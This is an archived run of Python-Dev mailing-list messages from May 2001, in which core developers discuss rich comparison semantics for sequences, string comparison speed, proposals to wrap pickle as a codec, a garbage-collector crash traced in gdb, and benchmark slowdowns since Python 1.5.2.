vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From barry@digicool.com Wed May 16 14:42:15 2001 From: barry@digicool.com (Barry A. Warsaw) Date: Wed, 16 May 2001 09:42:15 -0400 Subject: [Python-Dev] Comparison speed References: <15105.46090.203278.397835@anthem.wooz.org> Message-ID: <15106.33719.14403.13051@anthem.wooz.org> >>>>> "TP" == Tim Peters writes: TP> Random clue: when you're too lazy to try to subtact out loop TP> overhead (not a knock, I am too), you may have better luck TP> with TP> r = [1] * 1000000 TP> than TP> r = range(1000000) Ah, good point! 
From guido@digicool.com Wed May 16 16:01:40 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 10:01:40 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200." <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com> > Marc-Andre once proposed a type representing the immediate supertype > of both byte strings and unicode strings; let's call it abstract string. > Then I could write isinstance(e, types.AbstractString). This will probably be doable in 2.2. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 16 16:24:55 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 10:24:55 -0500 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400." References: Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com> > The question remaining is how much of this list/tuple richcmp behavior is > guaranteed by the language and how much is just implementation-dependent > fuzz. Unclear what you're asking. The language doesn't require any particular semantics for sequence comparisons, but the language of course includes the tuple and list sequence types, and it describes (albeit lacking some rigorous detail) what comparisons for those do. If there are specific lacks of detail, it probably helps to think about filling those in. > For a more vanilla example, I removed the EQ/NE "lengths differ?" > tuple richcmp early-exit test because I never found code that made > it trigger. (but tons of code that gets there without triggering).
> But this has semantic implications too: an implementation without > the early exit may call user-defined comparison routines that raise > exceptions when comparing tuples of different lengths now. Do you > care? (I don't.) I don't care about exceptions either in this case; the shortcut seems fair game. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip@pobox.com (Skip Montanaro) Wed May 16 15:28:04 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Wed, 16 May 2001 09:28:04 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: <3B025F26.A625DE02@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> Message-ID: <15106.36468.62292.611515@beluga.mojam.com> mal> pickle and marshal would also be a good to have wrapped as codecs. Why? They operate on much more than strings. -- Skip Montanaro (skip@pobox.com) (847)971-7098 From fredrik@effbot.org Wed May 16 16:07:18 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Wed, 16 May 2001 17:07:18 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid> skip wrote: > mal> pickle and marshal would also be a good to have wrapped as codecs. > > Why? They operate on much more than strings. hypergeneralization, of course. 
more candidates:

    "10".decode("int")
    "10.0".decode("float")
    "[1, 2, 3]".decode("list")
    "readme.txt".decode("file")
    "SyntaxError".decode("raise")
    (etc)

Cheers /F

From nas@python.ca Wed May 16 17:19:42 2001 From: nas@python.ca (Neil Schemenauer) Date: Wed, 16 May 2001 09:19:42 -0700 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200 References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> Message-ID: <20010516091942.A16455@glacier.fnational.com> Martin v. Loewis wrote: > In any case, I think you need to analyse this in a debugger.

    #7  0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 , arg=0x0)
        at ../Objects/tupleobject.c:366
    366             err = visit(x, arg);
    (gdb) p *o
    $11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}}
    (gdb) p *o->ob_item[0]
    $12 = {ob_refcnt = 2, ob_type = 0x0}

In other words the GC is finding a tuple object that contains an element with a funny looking address (data segment?) and an ob_type of NULL.
The collector has started running from here: #10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467 #11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507 #12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149 #13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249 #14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495 #15 0x08095fb1 in export_subclassed_type (dict=0x81851fc, name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451 #16 0x400194ac in pygobject_register_class (dict=0x81851fc, class_name=0x402a9388 "GdkDragContext", get_type=0x404d5c50 , ec=0x402bcc40, bases=0x816fc34) at gobjectmodule.c:202 #17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844 #18 0x40257004 in init_gtk () at gtkmodule.c:98 I don't have time to dig deeper into this right now but perhaps this will help someone. Neil From mal@lemburg.com Wed May 16 17:24:57 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 18:24:57 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid> Message-ID: <3B02A9D9.113836D6@lemburg.com> Fredrik Lundh wrote: > > skip wrote: > > > mal> pickle and marshal would also be a good to have wrapped as codecs. > > > > Why? They operate on much more than strings. Of course. Still their basic task is to take an object and encode in some way for dumps() and do the reverse for loads(). 
That's pretty much what codecs normally do ;-) I wasn't referring to the use of pickle and marshal with string.encode() and .decode(); even though you could then decode a pickle using "pickledata".decode("pickle") and get back the object. These two are very useful though when it comes to using codecs for file wrappers:

    f = codecs.open('mypicklfile', mode='wb', encoding='pickle')
    f.write((123, 'abc', 456.789))
    f.close()

    f = codecs.open('mypicklfile', mode='rb', encoding='pickle')
    t = f.read()
    f.close()

> hypergeneralization, of course. > > more candidates: > > "10".decode("int") > "10.0".decode("float") > "[1, 2, 3]".decode("list") > "readme.txt".decode("file") > "SyntaxError".decode("raise") > (etc) You forgot the most important one ;-) ... "print 'My first Python program'".decode("python").run() -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From skip@pobox.com (Skip Montanaro) Wed May 16 18:44:15 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Wed, 16 May 2001 12:44:15 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: <3B02A9D9.113836D6@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid> <3B02A9D9.113836D6@lemburg.com> Message-ID: <15106.48239.813965.579600@beluga.mojam.com> mal> Still their basic task is to take an object and encode in some way mal> for dumps() and do the reverse for loads(). That's pretty much mal> what codecs normally do ;-) Yes, I see that. The conceptual problem I have is that in all previous examples I've seen here they have taken as input and returned as outputs only strings or unicode objects.
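Skip's point can be illustrated with a Python 3 sketch of a codec whose encoder accepts an arbitrary object. This is not MAL's pickle codec: the codec name `pickledemo` and the helper functions are hypothetical, and the sketch relies on `codecs.encode()` and `codecs.decode()` handing the object straight to the registered functions, so nothing forces the input to be a string. The search function returns `None` for names it does not handle, which lets the registry report an unknown name as `LookupError`, the behaviour Michael and MAL lean towards above.

```python
import codecs
import pickle


def _pickle_encode(obj, errors="strict"):
    # Codec encoders return (output, amount consumed); "amount consumed"
    # has no meaning for an arbitrary object, so 0 is reported here.
    return pickle.dumps(obj), 0


def _pickle_decode(data, errors="strict"):
    # Only unpickle trusted data: pickle.loads can run arbitrary code.
    return pickle.loads(data), len(data)


def _search(name):
    # Returning None means "not mine"; if no search function claims the
    # name, codecs.lookup() raises LookupError.
    if name == "pickledemo":
        return codecs.CodecInfo(_pickle_encode, _pickle_decode, name="pickledemo")
    return None


codecs.register(_search)

blob = codecs.encode((123, "abc", 456.789), "pickledemo")
print(type(blob).__name__)                # bytes
print(codecs.decode(blob, "pickledemo"))  # (123, 'abc', 456.789)
```

The input to the encoder and the output of the decoder are ordinary Python objects, which is exactly the departure from strings-in, strings-out that Skip noticed.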
mal> These two are very useful though when it comes to using codecs mal> for file wrappers: This use I missed. Thanks for the explanation. Skip

From mal@lemburg.com Wed May 16 19:33:44 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 20:33:44 +0200 Subject: [Python-Dev] Performance compares Message-ID: <3B02C808.E3354D3F@lemburg.com> After having read a little into the comparison thread, I tried some performance compares on my own: the one between the current CVS version and Python 1.5.2. Both versions were compiled on the same Linux machine, using the same GCC compiler and optimization settings. Here are the results from pybench 0.9 and pystone; some of the figures show quite dramatic slow-downs. I'm not sure where they result from, but they do concern me a bit, since the upgrade path from 1.5.2 is probably the most common one to be expected in user-land. Since it is possible that these figures result from my specific machine setup, I'd like to know what other people see on their machines. Thanks.

--
Python 1.5.2:
Pystone(1.1) time for 10000 passes = 3.26
This machine benchmarks at 3067.48 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 4.43
This machine benchmarks at 2257.34 pystones/second

--
PYBENCH 0.9

Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20)

Tests:                                per run  per oper. diff *)
------------------------------------------------------------------------
          BuiltinFunctionCalls:    1152.60 ms    9.04 us +64.70%
           BuiltinMethodLookup:     903.90 ms    1.72 us
                 CompareFloats:     908.30 ms    2.02 us +40.94%
         CompareFloatsIntegers:    1276.25 ms    2.84 us +37.15%
               CompareIntegers:    1075.50 ms    1.19 us +21.09%
                  CompareLongs:     989.40 ms    2.20 us +47.12%
                CompareStrings:     844.80 ms    2.25 us +33.99%
                CompareUnicode:    1018.65 ms    2.72 us     n/a
                 ConcatStrings:    1226.30 ms    8.18 us +92.56%
                 ConcatUnicode:    1575.40 ms   10.50 us     n/a
               CreateInstances:    2094.05 ms   49.86 us +101.86%
       CreateStringsWithConcat:    1515.75 ms    7.58 us +111.67%
       CreateUnicodeWithConcat:    1833.85 ms    9.17 us     n/a
                  DictCreation:    2795.30 ms   18.64 us +203.34%
             DictWithFloatKeys:    2285.70 ms    3.81 us +18.73%
           DictWithIntegerKeys:    1444.65 ms    2.41 us +58.53%
            DictWithStringKeys:    1262.60 ms    2.10 us +52.83%
                      ForLoops:     989.95 ms   99.00 us -10.01%
                    IfThenElse:    1232.45 ms    1.83 us +23.25%
                   ListSlicing:     621.40 ms  177.54 us
                NestedForLoops:     986.60 ms    2.82 us +52.09%
          NormalClassAttribute:    1231.15 ms    2.05 us +36.70%
       NormalInstanceAttribute:    1114.15 ms    1.86 us +27.11%
           PythonFunctionCalls:    1251.25 ms    7.58 us +46.09%
             PythonMethodCalls:    1034.35 ms   13.79 us +42.19%
                     Recursion:     922.15 ms   73.77 us +36.76%
                  SecondImport:    1055.45 ms   42.22 us +100.47%
           SecondPackageImport:    1061.35 ms   42.45 us +96.31%
         SecondSubmoduleImport:    1292.35 ms   51.69 us +77.89%
       SimpleComplexArithmetic:    1748.00 ms    7.95 us +120.97%
        SimpleDictManipulation:    1172.85 ms    3.91 us +47.85%
         SimpleFloatArithmetic:     881.25 ms    1.60 us +12.30%
      SimpleIntFloatArithmetic:     833.80 ms    1.26 us
       SimpleIntegerArithmetic:     839.00 ms    1.27 us
        SimpleListManipulation:    1252.60 ms    4.64 us +69.37%
          SimpleLongArithmetic:    1360.65 ms    8.25 us +100.43%
                    SmallLists:    2380.05 ms    9.33 us +116.72%
                   SmallTuples:    1793.80 ms    7.47 us +101.52%
         SpecialClassAttribute:    1257.35 ms    2.10 us +37.91%
      SpecialInstanceAttribute:    1340.25 ms    2.23 us +21.13%
                StringMappings:    1601.50 ms   12.71 us     n/a
              StringPredicates:    1059.70 ms    3.78 us     n/a
                 StringSlicing:    1235.90 ms    7.06 us +98.32%
                     TryExcept:    1272.55 ms    0.85 us +28.39%
                TryRaiseExcept:    1383.45 ms   92.23 us +77.48%
                  TupleSlicing:    1163.05 ms   11.08 us +75.29%
               UnicodeMappings:    1232.80 ms   68.49 us     n/a
             UnicodePredicates:    1294.95 ms    5.76 us     n/a
             UnicodeProperties:    1410.45 ms    7.05 us     n/a
                UnicodeSlicing:    1296.80 ms    7.41 us     n/a
------------------------------------------------------------------------
            Average round time:   73388.00 ms                n/a

*) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20)

(The compares not shown are below noise level (+-10%))

-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/

From tim.one@home.com Wed May 16 20:07:49 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 16 May 2001 15:07:49 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49 In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com> Message-ID: [Tim] > The question remaining is how much of this list/tuple richcmp behavior is > guaranteed by the language and how much is just implementation-dependent > fuzz. [Guido] > Unclear what you're asking. The language doesn't require any > particular semantics for sequence comparisons, but the language of > course includes the tuple and list sequence types, and it describes > (albeit lacking some rigorous detail) what comparisons for those do. The current

    Tuples and lists are compared lexicographically using comparison
    of corresponding items.

was quite clear in a cmp-only world. In a richcmp world, "compared lexicographically" is fuzzy enough that different implementations may do different things in good faith, competent users may disagree about what it means in specific cases, and programs may yield different results across implementations (or random CVS patches ).
> If there are specific lacks of detail, it probably helps to think
> about filling those in.

The *level* of additional detail intended is the cutoff between what's guaranteed by the language and what's left up to the implementation. The full truth before was relatively simple. For a pair x, y of lists or tuples,

    def __cmp__(x, y): # pretending this is a method on lists and tuples
        i = 0
        while i < len(x) and i < len(y):
            c = cmp(x[i], y[i])
            if c:
                return c
            i += 1
        return cmp(len(x), len(y))

was *almost* the entire tale, incl. that lengths were re-fetched on each iteration. What's left unexplained is the treatment of recursive lists, and so the result of comparing them is a prime suspect for different behavior across implementations and releases.

In a richcmp world, there are several additional ways in which the above fails to capture the full truth, and each of those ways is another prime suspect for surprises. For example, I believe it's *intended* that:

1. Element comparisons continue to be strictly left-to-right, and that no element comparisons are to be performed after the leftmost element comparison that settles the issue (if any).

2. tuple/list comparison via == or != must use only == comparison on elements, and that implementations are allowed (but not required) to skip all element comparisons when == or != comparison is given lists/tuples of different sizes.

OTOH, I doubt (but don't know) it's intended that all implementations must emulate other semantically significant details of the current implementation, like:

1. <=, <, > and >= comparisons will do at most one element comparison that is not an == comparison.

2. Whenever a <, <=, > or >= element comparison is needed, the long-winded details of how that works, incl. but not limited to the specific "first try ==, then try <, then try >" strategy used to simulate a pre-richcmp cmp() when all else fails.

Going back to the original example:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> a, b = C(), C()
>>> a < b       #1
1
>>> [a] < [b]   #2
0
>>> cmp(a, b)   #3
0
>>> a > b       #4
1
>>> a == b      #5
1
>>> a != b      #6
1
>>>

Which of those results are *required* by the language, and which merely *allowed*?

+ I believe #1, #4 and #5 are required.

+ I have no idea whether to call it "a bug" if the #2 and/or #3 and/or #6 results differed, e.g., under Jython, or under CPython 2.3.

Indeed, I'm not even sure why #6 returns 1 under CPython today, and I've been staring at this a lot lately ... OK, #6 ends up getting resolved by comparing object addresses, which leaves "required or not?" fuzzy (i.e., *must* it be resolved that way? or is it implementation-defined?).

From guido@digicool.com Wed May 16 21:35:46 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 16 May 2001 15:35:46 -0500 Subject: [Python-Dev] Rich comparison of lists and tuples In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400." References: Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com> [Subject fixed] [Tim shows there's a lot left to the imagination when trying to glean the meaning of list1==list2 using rich comparisons.] I would like to break this down by defining the mapping between cmp() and rich comparisons. I propose:

- If cmp() is requested but not defined, and rich comparisons are defined, try ==, <, > in order; if all three yield false, act as if rich comparisons were not defined, and use the fallback comparison (i.e. by address).

- If a rich comparison is requested but not defined, use cmp() and use the obvious mapping.

- Continue to define the comparison of unequal sequences in terms of cmp().

- Testing == or != for sequences takes these shortcuts:

  1. if the lengths differ, the sequences differ
  2. compare the elements using == until a false return is found

Note that this defines 'x!=y' as 'not x==y' for sequences. We could easily go the extra mile and define != to use only != on the items; but is this worth the extra complexity?
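Guido's proposed shortcuts for sequence == and !=, together with the strict left-to-right ordering Tim describes, can be sketched in Python 3 as follows. This is a hedged illustration, not CPython's implementation: `seq_eq`, `seq_ne` and `seq_lt` are hypothetical names, and real CPython additionally treats identical items (`a is b`) as equal without calling `==` on them.

```python
def seq_eq(x, y):
    """Sequence == using the two proposed shortcuts."""
    if len(x) != len(y):      # 1. different lengths: unequal, no item compared
        return False
    for a, b in zip(x, y):    # 2. compare items with == until one is false
        if not (a == b):
            return False
    return True


def seq_ne(x, y):
    # The proposal defines x != y as "not x == y" for sequences.
    return not seq_eq(x, y)


def seq_lt(x, y):
    """Sequence < as a strictly left-to-right lexicographic comparison."""
    for a, b in zip(x, y):
        if not (a == b):
            # The first unequal pair decides; this is the only item
            # comparison that is not an == comparison.
            return a < b
    # All shared positions are equal, so the shorter sequence is smaller.
    return len(x) < len(y)


print(seq_eq([1, 2], [1, 2, 3]))  # False
print(seq_lt((1, 2), (1, 3)))     # True
print(seq_lt([1, 2], [1, 2, 0]))  # True
```

Defining `seq_ne` as `not seq_eq` is the simpler option Guido describes; the "extra mile" variant would instead loop with `!=` on the items.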
--Guido van Rossum (home page: http://www.python.org/~guido/) From skip@pobox.com (Skip Montanaro) Wed May 16 21:37:43 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Wed, 16 May 2001 15:37:43 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <20010516091942.A16455@glacier.fnational.com> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> <20010516091942.A16455@glacier.fnational.com> Message-ID: <15106.58647.495143.164636@beluga.mojam.com> Neil> In other words the GC is finding a tuple object that contains an Neil> element with a funny looking address (data segment?) and an Neil> op_type of NULL. Neil, I'm not sure if the funny looking address is a red herring or the key to the crime. I tried running with a breakpoint set in getBaseDictionary. The first couple times, the type parameter looked like $26 = (PyExtensionClass *) 0x80e7f60 $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7138 "ExtensionClass", ...} $28 = (PyExtensionClass *) 0x80e8060 $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7209 "Base", ...} The third time it looked like $30 = (PyExtensionClass *) 0x4019f120 $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x4019dab2 "GObject", ...} The difference between the first two calls and the third one is that the first two objects are defined in ExtensionClass.o, which I currently statically link into the interpreter. The Gtk/GObject stuff is dynamically loaded into the running executable, so it's not surprising that it winds up at a wildly different address than the ExtensionClass stuff. 
My current best guess is that whatever object the tuple is referring to is declared static in the dynamically loaded Gtk stuff and has no business getting reclaimed by the collector. Sounds like a missing Py_INCREF somewhere. At the earliest point I've been able to check that object so far, its ob_type field is NULL. Skip From cpr@emsoftware.com Wed May 16 23:24:15 2001 From: cpr@emsoftware.com (Chris Ryland) Date: Wed, 16 May 2001 18:24:15 -0400 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2> This talk is most entertaining! Highly recommended to you good folk, if only as a reinforcement of the good design principles embodied in Python (with the exception of print >> ;-). Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he wanted to give an example of a modern dynamic language (disclaiming a lot of knowledge about it). He mentioned it three or four times (usually positively), so it must be on the tip of his mind. -- Cheers! Chris Ryland Em Software, Inc. www.emsoftware.com From greg@cosc.canterbury.ac.nz Thu May 17 02:49:31 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 17 May 2001 13:49:31 +1200 (NZST) Subject: [Python-Dev] Easy codec access In-Reply-To: <3B02A9D9.113836D6@lemburg.com> Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > You forgot the most important one ;-) ... > > "print 'My first Python program'".decode("python").run() Surely that should be: "'My first Python program'.encode('stdout')".decode("python").decode("run") Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. 
| greg@cosc.canterbury.ac.nz +--------------------------------------+ From tim.one@home.com Thu May 17 02:56:56 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 16 May 2001 21:56:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > I'll put a patch on SF soon which does what you want to do, i.e. tries > tp_compare as the first thing if tp_richcompare is not there. Thanks! I'll check it out. > Even with this patch, your code is faster if strings have a > richcompare. OK, from what I understand, that makes no sense. Does it to you? Assuming you're still talking about my silly little "ab" < "cd" test, then all the new code you put into your richcompare slot was a waste of cycles for that specific case: the new richcmp "objects the same type?" test would fail, then the new "pointers equal?" test would fail, then the new "op == Py_EQ?" test would fail, and then richcompare would give up and call string_compare() anyway. So I'm either missing something fundamental about what you did, or it's a timing anomaly on your box that defies obvious explanation ("but if I add three new tests that don't pay off, and make an extra call, then it's faster!").

> Without richcompare, I get
>
> 0.720 0.720 0.720 0.730 0.720 0.720 0.730 0.720 0.720 0.730
>
> With it, I get
>
> 0.710 0.720 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720

See above.

> Given that stock CVS python is in the 0.78 range, the difference is
> negligible, though.

Oh, I don't like giving up that easy on things that make no sense -- something else is happening here, although I've no idea what.
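Tim's argument is easiest to see by tracing which checks run. The following is a hypothetical Python model, not Martin's C patch: `string_compare` and `string_richcompare` only stand in for the C functions of the same names, the shortcuts follow the order Tim lists, and the `Py_EQ` branch borrows the length, first-byte, full-compare fast path Martin proposes elsewhere in this thread. For `"ab" < "cd"` every shortcut runs, none decides the result, and the model still ends up calling the 3-way compare.

```python
EQ, LT, LE, NE, GT, GE = "==", "<", "<=", "!=", ">", ">="


def string_compare(a: bytes, b: bytes) -> int:
    """3-way compare standing in for the C string_compare(): -1, 0 or 1."""
    return (a > b) - (a < b)


def string_richcompare(a, b, op, trace):
    """Model of a rich-compare slot that tries shortcuts before falling back.

    Every check is appended to `trace` so callers can see which ones ran.
    """
    trace.append("same type?")
    if type(a) is not type(b):
        return NotImplemented          # let the caller try something else
    trace.append("identical?")
    if a is b:
        return op in (EQ, LE, GE)      # an object compared with itself
    trace.append("op == EQ?")
    if op == EQ:
        # Equality fast path: length, then first byte, then full compare.
        if len(a) != len(b):
            return False
        if len(a) == 0:
            return True
        if a[0] != b[0]:
            return False
        return a == b
    # No shortcut applied: pay for the extra call to the 3-way compare.
    trace.append("fallback to string_compare")
    c = string_compare(a, b)
    return {LT: c < 0, LE: c <= 0, NE: c != 0, GT: c > 0, GE: c >= 0}[op]


trace = []
print(string_richcompare(b"ab", b"cd", LT, trace), trace)
```

Recording the checks in a list (instead of timing them) keeps the model deterministic; it shows the extra work Tim describes, not how much it costs on any particular machine.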
From tim.one@home.com Thu May 17 03:17:37 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 16 May 2001 22:17:37 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B02C808.E3354D3F@lemburg.com> Message-ID: [MAL] > Since it is possible that these figures result from my specific > machine setup, I'd like to know what other people see on their > machines. Is this the same machine where you were able to get 15% difference a few years ago by adding or removing an unreachable printf in ceval.c (or was that Vladimir)? If so, I bet it's degenerated to random 50% difference since then . My Win98SE box is *astonishingly* useless for timings. Without fail, the first time I run pystone after a reboot yields a result a solid 50% higher than the second or subsequent times I run it (yes, it's major-league *slower* the second time). This is true across dozens of trials over several months, and across all versions of Python. And simple little loops routinely vary in reported runtime by a factor of 3. I may have to dig my old Win95 box out of the packing crate <0.6 wink>. None of that changes, of course, that the numbers you got are scary. From jeremy@digicool.com Wed May 16 23:37:47 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Wed, 16 May 2001 18:37:47 -0400 (EDT) Subject: [Python-Dev] Performance compares In-Reply-To: <3B02C808.E3354D3F@lemburg.com> References: <3B02C808.E3354D3F@lemburg.com> Message-ID: <15107.315.19349.268345@slothrop.digicool.com> As usual, the results you're reporting are quite different than what I see on my machine. I'd like to think that my machine is more normal than yours, but I expect we're both oddballs <0.2 wink>. I see basically the same slowdowns that you see, but the amount of the slowdown is quite a bit smaller. I compared current CVS with 1.5.2, both compiled with GCC 2.95.3 and the -O3 flag; ran pybench on an 800MHz P3 with 256MB RAM running Linux 2.2.17.
Python 1.5.2:
Pystone(1.1) time for 10000 passes = 0.85
This machine benchmarks at 11764.7 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 0.94
This machine benchmarks at 10638.3 pystones/second

PYBENCH 0.9

Benchmark: cvs (rounds=10, warp=100)

Tests:                       per run per oper.    diff *
------------------------------------------------------------------------
BuiltinFunctionCalls:       41.85 ms   1.64 us   +31.40%
CompareFloats:              39.60 ms   0.44 us   +13.96%
CompareFloatsIntegers:
CompareIntegers:
CompareLongs:               39.85 ms   0.44 us   +15.01%
CompareStrings:
CompareUnicode:
ConcatStrings:              48.65 ms   1.62 us   +46.76%
ConcatUnicode:
CreateInstances:            75.75 ms   9.02 us   +55.54%
CreateStringsWithConcat:    51.60 ms   1.29 us   +62.78%
CreateUnicodeWithConcat:
DictCreation:               87.80 ms   2.93 us  +115.72%
DictWithFloatKeys:
DictWithIntegerKeys:
DictWithStringKeys:
ForLoops:                   63.85 ms  31.93 us   -13.60%
IfThenElse:
ListSlicing:
NestedForLoops:             32.95 ms   0.66 us   +10.39%
NormalClassAttribute:
NormalInstanceAttribute:
PythonFunctionCalls:        48.85 ms   1.48 us   +11.78%
PythonMethodCalls:          38.95 ms   2.60 us   +12.09%
Recursion:
SecondImport:               37.80 ms   7.56 us   +65.79%
SecondPackageImport:        38.95 ms   7.79 us   +50.68%
SecondSubmoduleImport:      49.90 ms   9.98 us   +35.05%
SimpleComplexArithmetic:    58.95 ms   1.34 us   +74.67%
SimpleDictManipulation:
SimpleFloatArithmetic:
SimpleIntFloatArithmetic:
SimpleIntegerArithmetic:
SimpleListManipulation:     43.65 ms   0.81 us   +15.63%
SimpleLongArithmetic:       42.70 ms   1.29 us   +53.32%
SmallLists:                 79.15 ms   1.55 us   +56.89%
SmallTuples:                66.65 ms   1.39 us   +43.03%
SpecialClassAttribute:
SpecialInstanceAttribute:
StringMappings:
StringPredicates:
StringSlicing:              39.00 ms   1.11 us   +28.71%
TryExcept:
TryRaiseExcept:             50.60 ms  16.87 us   +27.46%
TupleSlicing:               37.90 ms   1.80 us   +26.54%
UnicodeMappings:
UnicodePredicates:
UnicodeProperties:
UnicodeSlicing:
------------------------------------------------------------------------
Average round time:       3177.00 ms       n/a

*) measured against: 1.5.2 (rounds=10, warp=100)

(As MAL did, I
removed all the results where the difference is within +/- 10%.) i-never-do-simple-complex-arithmetic-anyway-ly yr's, Jeremy From martin@loewis.home.cs.tu-berlin.de Thu May 17 07:12:18 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:12:18 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> > OK, from what I understand, that makes no sense. Does it to you? After reviewing everything again, I think I now do: In the richcomp case, I have

    res = (*f1)(v, w, op);
    if (res != Py_NotImplemented)
        return res;

f1 is string_richcompare, so I get 2 function calls inside do_richcmp: one to string_richcompare, the other one to string_compare, as my optimizations are not triggered in your example. If I set tp_richcompare of strings to 0, I get past this code, and do

    c = (*f)(v, w);
    if (PyErr_Occurred())
        return NULL;
    return convert_3way_to_object(op, c);

